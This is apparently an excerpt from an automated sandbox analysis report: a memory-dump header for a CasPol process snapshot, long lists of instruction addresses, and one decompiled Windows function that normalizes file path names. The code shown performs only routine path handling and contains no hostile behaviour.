                                                                0x004223d5
                                                                0x004223db
                                                                0x004223e1
                                                                0x00000000
                                                                0x00000000
                                                                0x004223e7
                                                                0x004223ed
                                                                0x004223f3
                                                                0x00422402
                                                                0x00422408
                                                                0x0042240f
                                                                0x00422411
                                                                0x0042241d
                                                                0x00422423
                                                                0x00422426
                                                                0x0042242c
                                                                0x00422433
                                                                0x00000000
                                                                0x00000000
                                                                0x0042243f
                                                                0x00422442
                                                                0x00422449
                                                                0x00422450
                                                                0x00422457
                                                                0x0042245e
                                                                0x0042245e
                                                                0x0042245e
                                                                0x00422464
                                                                0x00000000
                                                                0x00000000
                                                                0x0042246a
                                                                0x00422470
                                                                0x00422477
                                                                0x00422478
                                                                0x0042247d
                                                                0x00422483
                                                                0x00422488
                                                                0x00422489
                                                                0x0042248f
                                                                0x0042248f
                                                                0x0042248f
                                                                0x00422495
                                                                0x004224a2
                                                                0x004224a8
                                                                0x004224a9
                                                                0x00000000
                                                                0x00000000
                                                                0x004224af
                                                                0x004224b5
                                                                0x004224bb
                                                                0x004224bc
                                                                0x004224c2
                                                                0x004224c8
                                                                0x004224cf
                                                                0x004224db
                                                                0x004224e2
                                                                0x004224e7
                                                                0x004224ee
                                                                0x004224f1
                                                                0x004224f7
                                                                0x00000000
                                                                0x00000000
                                                                0x004224fd
                                                                0x00422503
                                                                0x0042250a
                                                                0x00422510
                                                                0x00422516
                                                                0x0042251c
                                                                0x00422521
                                                                0x00422526
                                                                0x0042252d
                                                                0x00422533
                                                                0x00422534
                                                                0x00422535
                                                                0x0042253b
                                                                0x00422542
                                                                0x00422549
                                                                0x0042254a
                                                                0x00422550
                                                                0x0042255d
                                                                0x0042255e
                                                                0x0042255f
                                                                0x00422562
                                                                0x00422569
                                                                0x0042256c
                                                                0x00422572
                                                                0x00422573
                                                                0x0042257a
                                                                0x00422584
                                                                0x0042258a
                                                                0x00422591
                                                                0x00422597
                                                                0x00422598
                                                                0x0042259e
                                                                0x0042259f
                                                                0x004225a5
                                                                0x004225af
                                                                0x004225b0
                                                                0x004225b6
                                                                0x004225b8
                                                                0x004225be
                                                                0x004225c5
                                                                0x004225cb
                                                                0x004225d1
                                                                0x004225d2
                                                                0x004225d8
                                                                0x004225df
                                                                0x004225e5
                                                                0x004225eb
                                                                0x00000000
                                                                0x00000000
                                                                0x004225fd
                                                                0x00422603
                                                                0x00422608
                                                                0x0042260f
                                                                0x00422616
                                                                0x00422617
                                                                0x0042261d
                                                                0x0042261e
                                                                0x00422624
                                                                0x00422625
                                                                0x0042262c
                                                                0x00422632
                                                                0x00422638
                                                                0x0042263f
                                                                0x00422644
                                                                0x0042264a
                                                                0x00000000
                                                                0x00000000
                                                                0x00422650
                                                                0x00422657
                                                                0x0042265f
                                                                0x00422660
                                                                0x00422661
                                                                0x00000000
                                                                0x00000000
                                                                0x00422667
                                                                0x0042266d
                                                                0x0042266e
                                                                0x00422675
                                                                0x00422676
                                                                0x0042267c
                                                                0x0042267f
                                                                0x00422686
                                                                0x00000000
                                                                0x00000000
                                                                0x0042268c
                                                                0x00422692
                                                                0x00422698
                                                                0x0042269e
                                                                0x004226a5
                                                                0x004226ab
                                                                0x004226b1
                                                                0x004226b7
                                                                0x004226bd
                                                                0x004226bd
                                                                0x004226bd
                                                                0x004226c3
                                                                0x004226c3
                                                                0x004226c9
                                                                0x004226ca
                                                                0x004226ca
                                                                0x004226ca
                                                                0x004226d0
                                                                0x004226d7
                                                                0x004226d7
                                                                0x004226dd
                                                                0x004226e3
                                                                0x004226ef
                                                                0x004226f6
                                                                0x004226fc
                                                                0x00422702
                                                                0x00422709
                                                                0x0042270a
                                                                0x00422710
                                                                0x00422716
                                                                0x00422726
                                                                0x0042272d
                                                                0x0042272e
                                                                0x00422734
                                                                0x0042273a
                                                                0x00422740
                                                                0x00000000
                                                                0x00000000
                                                                0x00422746
                                                                0x0042275b
                                                                0x00422761
                                                                0x00422761
                                                                0x00422761
                                                                0x00422767
                                                                0x00000000
                                                                0x00000000
                                                                0x0042276d
                                                                0x00422774
                                                                0x0042277a
                                                                0x00422781
                                                                0x00422787
                                                                0x0042278b
                                                                0x00422791
                                                                0x00422797
                                                                0x00422797
                                                                0x00422797
                                                                0x0042279d
                                                                0x004227a3
                                                                0x004227a9
                                                                0x004227af
                                                                0x004227b0
                                                                0x004227b6
                                                                0x004227bc
                                                                0x004227c2
                                                                0x004227c8
                                                                0x004227ce
                                                                0x004227cf
                                                                0x004227d5
                                                                0x004227d6
                                                                0x004227dc
                                                                0x004227e2
                                                                0x004227e3
                                                                0x004227e9
                                                                0x004227ef
                                                                0x004227f6
                                                                0x004227fc
                                                                0x004227fd
                                                                0x00422803
                                                                0x0042280a
                                                                0x00422810
                                                                0x00422811
                                                                0x00422817
                                                                0x00000000
                                                                0x00000000
                                                                0x0042281d
                                                                0x00422823
                                                                0x0042282a
                                                                0x0042282b
                                                                0x00422831
                                                                0x00422834
                                                                0x0042283a
                                                                0x0042283b
                                                                0x0042283c
                                                                0x00422843
                                                                0x00422846
                                                                0x0042284c
                                                                0x00422852
                                                                0x00422857
                                                                0x00422863
                                                                0x00422869
                                                                0x00422870
                                                                0x00422875
                                                                0x00422885
                                                                0x0042288b
                                                                0x00422892
                                                                0x00422893
                                                                0x00422899
                                                                0x0042289f
                                                                0x004228a6
                                                                0x004228ac
                                                                0x004228b9
                                                                0x00000000
                                                                0x00000000
                                                                0x004228bf
                                                                0x004228c6
                                                                0x004228c7

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7855a91262499e74a833819bd6a50c096e99b9d096e8417f46f47b428b0aae3
                                                                • Instruction ID: 509941d02471cfaa0b7e45a818e523af46d733f3b8c874efea17fe81caa4faa2
                                                                • Opcode Fuzzy Hash: e7855a91262499e74a833819bd6a50c096e99b9d096e8417f46f47b428b0aae3
                                                                • Instruction Fuzzy Hash: 5E32B732A08790CFD716DF38D98AA413FB1F396724B44438ED4A2971E6D7392616CF89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01646E30 Relevance: .5, Instructions: 481COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 95%
                                                                			E01646E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x16ffca8);
				_push(0x16717f0);
				_push( *[fs:0x0]);
				_t312 =  *0x171d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E0166FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E016474C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E01659BC6( &_v52, 0x1601080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E01669377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E016A46A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M0164749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E016252A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L01632600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L01632600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L016A4735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E0166BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E01652010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L016A4658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E01659BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E016252A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L016283AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E016252A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L016283AE(_t428);
														L80:
														E01659BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x1601080;
														_v72 =  *0x1601080;
														__eax =  *0x1601084;
														_v68 =  *0x1601084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E01659BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E0164746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E0166B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                                                0x01646e30
                                                                0x01646e35
                                                                0x01646e37
                                                                0x01646e3c
                                                                0x01646e47
                                                                0x01646e4b
                                                                0x01646e50
                                                                0x01646e53
                                                                0x01646e55
                                                                0x01646e5b
                                                                0x01646e5f
                                                                0x01646e65
                                                                0x01646e68
                                                                0x01646e6a
                                                                0x01646e6d
                                                                0x01646e70
                                                                0x01646e73
                                                                0x01646e76
                                                                0x01646e79
                                                                0x01646e7c
                                                                0x01646e7f
                                                                0x01646e84
                                                                0x0164710f
                                                                0x0164710f
                                                                0x01646e8c
                                                                0x01646e8e
                                                                0x01646e8e
                                                                0x01646e97
                                                                0x0168f5d3
                                                                0x0168f5d3
                                                                0x01646e9d
                                                                0x01646ea3
                                                                0x01646eaa
                                                                0x01646ead
                                                                0x01646eb2
                                                                0x01646eb4
                                                                0x01646eb7
                                                                0x01647466
                                                                0x01647466
                                                                0x00000000
                                                                0x01646ebd
                                                                0x01646ebd
                                                                0x01646ec4
                                                                0x01646eca
                                                                0x01646ecc
                                                                0x01646ecf
                                                                0x01646ed2
                                                                0x01646ede
                                                                0x0168f5df
                                                                0x0168f5e0
                                                                0x00000000
                                                                0x0168f5e0
                                                                0x01646ee6
                                                                0x00000000
                                                                0x00000000
                                                                0x01646eec
                                                                0x01646ef3
                                                                0x01647181
                                                                0x01646f02
                                                                0x01646f02
                                                                0x01646f02
                                                                0x01646f0b
                                                                0x01646f0d
                                                                0x01646f10
                                                                0x01646f17
                                                                0x01646f21
                                                                0x01646f24
                                                                0x01646f2d
                                                                0x01646f31
                                                                0x01646f36
                                                                0x01646f3d
                                                                0x01647413
                                                                0x01647416
                                                                0x01647419
                                                                0x0164741c
                                                                0x01647421
                                                                0x0164742b
                                                                0x0164742b
                                                                0x0164742e
                                                                0x01647439
                                                                0x0168f60b
                                                                0x0168f60b
                                                                0x0168f615
                                                                0x0168f619
                                                                0x0164743f
                                                                0x01647447
                                                                0x01647454
                                                                0x0164745a
                                                                0x0164745f
                                                                0x0164745f
                                                                0x00000000
                                                                0x01647439
                                                                0x01647425
                                                                0x0168f5e9
                                                                0x0168f5ed
                                                                0x0168f5f4
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f5fd
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f603
                                                                0x0168f603
                                                                0x00000000
                                                                0x01646f43
                                                                0x01646f43
                                                                0x01646f45
                                                                0x01646f48
                                                                0x01646f4e
                                                                0x01646f65
                                                                0x01646f68
                                                                0x0164721f
                                                                0x01646f83
                                                                0x01646f86
                                                                0x016472dc
                                                                0x016472dc
                                                                0x01646f9e
                                                                0x01646fa1
                                                                0x01646fa3
                                                                0x01646fa5
                                                                0x01646fa8
                                                                0x01646fab
                                                                0x01646fae
                                                                0x01646fb1
                                                                0x01646fb4
                                                                0x01646fb6
                                                                0x01646fb9
                                                                0x01646fbf
                                                                0x0164718a
                                                                0x0164718e
                                                                0x0168f831
                                                                0x0168f831
                                                                0x0168f833
                                                                0x0168f836
                                                                0x00000000
                                                                0x0168f836
                                                                0x01647194
                                                                0x00000000
                                                                0x0168f658
                                                                0x0168f658
                                                                0x0168f65a
                                                                0x0168f65d
                                                                0x0168f662
                                                                0x0168f662
                                                                0x0168f665
                                                                0x0168f667
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f669
                                                                0x0168f66c
                                                                0x0168f670
                                                                0x0168f673
                                                                0x0168f67a
                                                                0x0168f67a
                                                                0x0168f67b
                                                                0x0168f67e
                                                                0x0168f681
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f683
                                                                0x0168f683
                                                                0x00000000
                                                                0x0168f683
                                                                0x0168f675
                                                                0x0168f678
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f678
                                                                0x0168f686
                                                                0x0168f688
                                                                0x0168f68b
                                                                0x0168f68e
                                                                0x0168f691
                                                                0x0168f694
                                                                0x0168f698
                                                                0x0168f69c
                                                                0x0168f6a0
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01647397
                                                                0x0164739c
                                                                0x0164739f
                                                                0x016473a3
                                                                0x016473a5
                                                                0x0168f6bb
                                                                0x0168f6c1
                                                                0x0168f6c4
                                                                0x016473ab
                                                                0x016473ab
                                                                0x016473ab
                                                                0x016473b1
                                                                0x016473b5
                                                                0x016473ba
